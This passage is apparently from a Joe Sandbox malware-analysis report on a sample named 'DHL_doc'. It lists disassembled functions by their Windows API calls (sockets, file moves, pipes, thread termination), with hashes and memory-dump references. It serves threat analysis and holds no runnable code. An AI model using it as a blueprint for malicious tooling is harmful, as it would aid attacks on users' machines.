__fassign.LIBCMT ref: 00EF5506
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00F03CD6,00000005,00000000,00000000), ref: 00EF552C
WriteFile.KERNEL32(?,00F03CD6,00000000,00EF5BA3,00000000,?,?,?,?,?,?,?,?,?,00EF5BA3,?), ref: 00EF554B
WriteFile.KERNEL32(?,?,00000001,00EF5BA3,00000000,?,?,?,?,?,?,?,?,?,00EF5BA3,?), ref: 00EF5584

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 52130719d1dfad292173ee148c2c2bcd9a6b20b92d2893507a8db2983009bb7f
Instruction ID: 55721b1bd3da9f05250274001b4f80abbe0a16d3985b0a9258dea358918f4a2e
Opcode Fuzzy Hash: 52130719d1dfad292173ee148c2c2bcd9a6b20b92d2893507a8db2983009bb7f
Instruction Fuzzy Hash: E451AF72A0064D9FDB11CFA8D845AEEBBF9EF19300F14511AE656F7291E6309A41CBA0

Function 00F410B8 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00F4304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00F4307A
Part of subcall function 00F4304E: _wcslen.LIBCMT ref: 00F4309B

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00F41112
WSAGetLastError.WSOCK32 ref: 00F41121
WSAGetLastError.WSOCK32 ref: 00F411C9
closesocket.WSOCK32(00000000), ref: 00F411F9

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
String ID:
API String ID: 2675159561-0
Opcode ID: 846255654e0fcba2429c1012f705f44159bb79bd2543959d1841219cbb2219a0
Instruction ID: b0926e17747d120d98e2b9e50f05cfc507762d3fd824a4be8db2671f713c1e7e
Opcode Fuzzy Hash: 846255654e0fcba2429c1012f705f44159bb79bd2543959d1841219cbb2219a0
Instruction Fuzzy Hash: 89410731600208AFDB109F24CC44BA9BBE9FF85325F148059FE069B291D775ED81DBE0

Function 00F2CF00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00F2DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00F2CF22,?), ref: 00F2DDFD

Part of subcall function 00F2DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00F2CF22,?), ref: 00F2DE16

lstrcmpiW.KERNEL32(?,?), ref: 00F2CF45
MoveFileW.KERNEL32(?,?), ref: 00F2CF7F
_wcslen.LIBCMT ref: 00F2D005
_wcslen.LIBCMT ref: 00F2D01B
SHFileOperationW.SHELL32(?), ref: 00F2D061

Strings

\*.*, xrefs: 00F2CFF3

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
String ID: \*.*
API String ID: 3164238972-1173974218
Opcode ID: 31d8b443c168ff4c90104296f9d67f52fab74e25316e945fe63701e3c3a454a5
Instruction ID: f9bdcc308bdf101bcded1b2b5ff4a42d44335cb376d1019c2b006f81bbf7d2da
Opcode Fuzzy Hash: 31d8b443c168ff4c90104296f9d67f52fab74e25316e945fe63701e3c3a454a5
Instruction Fuzzy Hash: C3415571D4522D5EDF12EBA4DE81EDDB7F8AF08380F1000E6E545EB142EA34A644DB50

Function 00F52DFD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00F52E1C
GetWindowLongW.USER32(00000000,000000F0), ref: 00F52E4F
GetWindowLongW.USER32(00000000,000000F0), ref: 00F52E84
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00F52EB6
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00F52EE0
GetWindowLongW.USER32(00000000,000000F0), ref: 00F52EF1
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00F52F0B

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: 811f0acb8e3fca9d9da937b65e759f054e29f950df9dae6b77d2d9704e92f689
Instruction ID: 663e8d59ee2d3908818b6c9b981ff694261e71fbc0b120033bb7a369d900ab76
Opcode Fuzzy Hash: 811f0acb8e3fca9d9da937b65e759f054e29f950df9dae6b77d2d9704e92f689
Instruction Fuzzy Hash: BF312631A042499FEB61CF58DC86F6537E0FB4A722F150265FA058F2B1CB71AC44EB40

Function 00F27726 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F27769
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F2778F
SysAllocString.OLEAUT32(00000000), ref: 00F27792
SysAllocString.OLEAUT32(?), ref: 00F277B0
SysFreeString.OLEAUT32(?), ref: 00F277B9
StringFromGUID2.OLE32(?,?,00000028), ref: 00F277DE
SysAllocString.OLEAUT32(?), ref: 00F277EC

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: a245da0495203e766e453fe1308b11925c094da9cc9d9ee35bfb336b823c9468
Instruction ID: f3fb37d7985550227218357be30ca04d4fe84a82a9183d9de7549744bcd96043
Opcode Fuzzy Hash: a245da0495203e766e453fe1308b11925c094da9cc9d9ee35bfb336b823c9468
Instruction Fuzzy Hash: 01219076A04329AFDB10EFA8DC88DBB77ACEB097647048025FA15DB290D670DC4197A0

Function 00F277FD Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F27842
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F27868
SysAllocString.OLEAUT32(00000000), ref: 00F2786B
SysAllocString.OLEAUT32 ref: 00F2788C
SysFreeString.OLEAUT32 ref: 00F27895
StringFromGUID2.OLE32(?,?,00000028), ref: 00F278AF
SysAllocString.OLEAUT32(?), ref: 00F278BD

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 56023716e00e5f65c5967a7269e2a3dad93ec70c440c77293c8802191ca93c20
Instruction ID: 87e7045910f9dc87f0441563b39d3d3e8caff0b8f207573fa7249d77bb394d8a
Opcode Fuzzy Hash: 56023716e00e5f65c5967a7269e2a3dad93ec70c440c77293c8802191ca93c20
Instruction Fuzzy Hash: 9F217735604318AFDB10EFA9DC88DAA77ECEB097607108125FA15CB2A5D670DC41DB64

Function 00F304D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00F304F2
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00F3052E

Strings

nul, xrefs: 00F30567

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: 79c7cd3c6598d4f97e8d96f22567475c54d7a6b4912199733f95fbe0b3ac74a5
Instruction ID: b80c4d8e42f4cee1f923d03ee1a387eed3bdcbd01a628b86ab151c877f70b2dd
Opcode Fuzzy Hash: 79c7cd3c6598d4f97e8d96f22567475c54d7a6b4912199733f95fbe0b3ac74a5
Instruction Fuzzy Hash: C9216D75900309EFDB209F29DC54A9A77A4AF44734F244A1AF9A2D62E0DB709940EF60

Function 00F305A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00F305C6
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00F30601

Strings

nul, xrefs: 00F30639

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: 10fbb1a489be3188be5702f9857749aa7b1b133096c91555d1911c4c16465543
Instruction ID: 67c33992531518daf799bc2920fdbb0b229c6b65bb22398ca00520ae0ebd06bd
Opcode Fuzzy Hash: 10fbb1a489be3188be5702f9857749aa7b1b133096c91555d1911c4c16465543
Instruction Fuzzy Hash: 0521A9759003059FDB209F69CC15A9A77E8BF95730F200B1AF9A1D72D4DF709850EB50

Function 00F540AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00EC600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00EC604C
Part of subcall function 00EC600E: GetStockObject.GDI32(00000011), ref: 00EC6060
Part of subcall function 00EC600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00EC606A

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00F54112
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00F5411F
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00F5412A
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00F54139
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00F54145

Strings

Msctls_Progress32, xrefs: 00F540E3

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 12c75234c8ab13944237ab4111270870d5a4d258124de075a0a0c26d14bd1796
Instruction ID: 2c54518a9f5b1a6e72f27796abc5da60fca773e99dea7c60ebae7066c10e4e4e
Opcode Fuzzy Hash: 12c75234c8ab13944237ab4111270870d5a4d258124de075a0a0c26d14bd1796
Instruction Fuzzy Hash: E811B6B214021D7EEF119F64CC86EE77F9DEF08798F104111BB18A2090C672DC61EBA4

Function 00EFD7DF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00EFD7A3: _free.LIBCMT ref: 00EFD7CC

_free.LIBCMT ref: 00EFD82D

Part of subcall function 00EF29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00EFD7D1,00000000,00000000,00000000,00000000,?,00EFD7F8,00000000,00000007,00000000,?,00EFDBF5,00000000), ref: 00EF29DE
Part of subcall function 00EF29C8: GetLastError.KERNEL32(00000000,?,00EFD7D1,00000000,00000000,00000000,00000000,?,00EFD7F8,00000000,00000007,00000000,?,00EFDBF5,00000000,00000000), ref: 00EF29F0

_free.LIBCMT ref: 00EFD838
_free.LIBCMT ref: 00EFD843
_free.LIBCMT ref: 00EFD897
_free.LIBCMT ref: 00EFD8A2
_free.LIBCMT ref: 00EFD8AD
_free.LIBCMT ref: 00EFD8B8

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
Instruction ID: 7438619a9132326736b2f1c34b3f225de08b584d160b4824bda1395112fa2189
Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
Instruction Fuzzy Hash: 6D111C71584B0CAAD621BFB0CC47FEB7FDDAF44700F40582AB399BA4E2DB65B5058660

Function 00F2DA5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00F2DA74
LoadStringW.USER32(00000000), ref: 00F2DA7B
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00F2DA91
LoadStringW.USER32(00000000), ref: 00F2DA98
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00F2DADC

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00F2DAB9

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: HandleLoadModuleString$Message
String ID: %s (%d) : ==> %s: %s %s
API String ID: 4072794657-3128320259
Opcode ID: eb1af3c398c1f4a4761933f2e362c0aec7943f19cba45d339a58c2b1f55710cb
Instruction ID: a2fa2a19f2c7c3bfca6804fd6745af01264774f4c5a9e72f0c20a8ee853aa9b2
Opcode Fuzzy Hash: eb1af3c398c1f4a4761933f2e362c0aec7943f19cba45d339a58c2b1f55710cb
Instruction Fuzzy Hash: FC0162F290031C7FE710EBA09D89EEB366CE708706F404491B706E2042EA749E849FB4

Function 00F3096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(018C5F18,018C5F18), ref: 00F3097B
EnterCriticalSection.KERNEL32(018C5EF8,00000000), ref: 00F3098D
TerminateThread.KERNEL32(00540050,000001F6), ref: 00F3099B
WaitForSingleObject.KERNEL32(00540050,000003E8), ref: 00F309A9
CloseHandle.KERNEL32(00540050), ref: 00F309B8
InterlockedExchange.KERNEL32(018C5F18,000001F6), ref: 00F309C8
LeaveCriticalSection.KERNEL32(018C5EF8), ref: 00F309CF

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 39e205eb7c505574d784d135e417b1e3e41fcc9d149b17045c1b093da02d0779
Instruction ID: beeaa63b5a748daa026cb595557cf773a302b7e7129cb5dfbfec4ddccfd99989
Opcode Fuzzy Hash: 39e205eb7c505574d784d135e417b1e3e41fcc9d149b17045c1b093da02d0779
Instruction Fuzzy Hash: AEF01D31442B06BFD7415B94EE88BDA7A35FF01712F401016F203508A0CB749465EFD0

Function 00EC5D0A Relevance: 9.3, APIs: 6, Instructions: 276COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 00EC5D30
GetWindowRect.USER32(?,?), ref: 00EC5D71
ScreenToClient.USER32(?,?), ref: 00EC5D99
GetClientRect.USER32(?,?), ref: 00EC5ED7
GetWindowRect.USER32(?,?), ref: 00EC5EF8

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: df6df3a84b92d6019f861a8b33a250cd13e5779146f7846b5a435a5cc00359ad
Instruction ID: 4f86f3ff1a889bdcac420ccdb0ff29511825caae8b86044844c9edcbd644e3c2
Opcode Fuzzy Hash: df6df3a84b92d6019f861a8b33a250cd13e5779146f7846b5a435a5cc00359ad
Instruction Fuzzy Hash: FCB15A75A0074ADFDB14CFA8C540BEAB7F1BF44310F14941EE9A9E7290D730AA91EB54

Function 00EF01B7 Relevance: 9.3, APIs: 6, Instructions: 269COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 00EF00BA
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00EF00D6
__allrem.LIBCMT ref: 00EF00ED
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00EF010B
__allrem.LIBCMT ref: 00EF0122
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00EF0140

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
Instruction ID: c7fca3bba2df07d8298e6ae85daa9d2c47a72a357fb60b62053e3ea2d318762a
Opcode Fuzzy Hash: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
Instruction Fuzzy Hash: 6A81E672B01B0E9BE724AF69CC41B7A73E9AF45724F24563AF651F62C2EB70D9008750

Function 00F41D10 Relevance: 9.3, APIs: 6, Instructions: 254networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00F43149: select.WSOCK32(00000000,?,00000000,00000000,?,?,?,00000000,?,?,?,00F4101C,00000000,?,?,00000000), ref: 00F43195

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00F41DC0
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00F41DE1
WSAGetLastError.WSOCK32 ref: 00F41DF2
inet_ntoa.WSOCK32(?), ref: 00F41E8C
htons.WSOCK32(?,?,?,?,?), ref: 00F41EDB
_strlen.LIBCMT ref: 00F41F35

Part of subcall function 00F239E8: _strlen.LIBCMT ref: 00F239F2

Part of subcall function 00EC6D9E: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000002,?,?,?,?,00EDCF58,?,?,?), ref: 00EC6DBA
Part of subcall function 00EC6D9E: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,00EDCF58,?,?,?), ref: 00EC6DED

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: ByteCharMultiWide_strlen$ErrorLasthtonsinet_ntoaselect
String ID:
API String ID: 1923757996-0
Opcode ID: 7b80f65d840fc9560571b8336af6a3ac4a641c9982be6774279fce67f33a8d77
Instruction ID: 133b66c0142d079b145e5ff32a1635e83367b8d193c1e6a73616f44792472637
Opcode Fuzzy Hash: 7b80f65d840fc9560571b8336af6a3ac4a641c9982be6774279fce67f33a8d77
Instruction Fuzzy Hash: F5A1D171504340AFC324DF24C885F2A7BE5BF84328F54995CF8566B2A2DB31ED86DB91

Function 00EF61FE Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00EE82D9,00EE82D9,?,?,?,00EF644F,00000001,00000001,?), ref: 00EF6258
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00EF644F,00000001,00000001,?,?,?,?), ref: 00EF62DE
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00EF63D8
__freea.LIBCMT ref: 00EF63E5

Part of subcall function 00EF3820: RtlAllocateHeap.NTDLL(00000000,?,00F91444,?,00EDFDF5,?,?,00ECA976,00000010,00F91440,00EC13FC,?,00EC13C6,?,00EC1129), ref: 00EF3852

__freea.LIBCMT ref: 00EF63EE
__freea.LIBCMT ref: 00EF6413

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
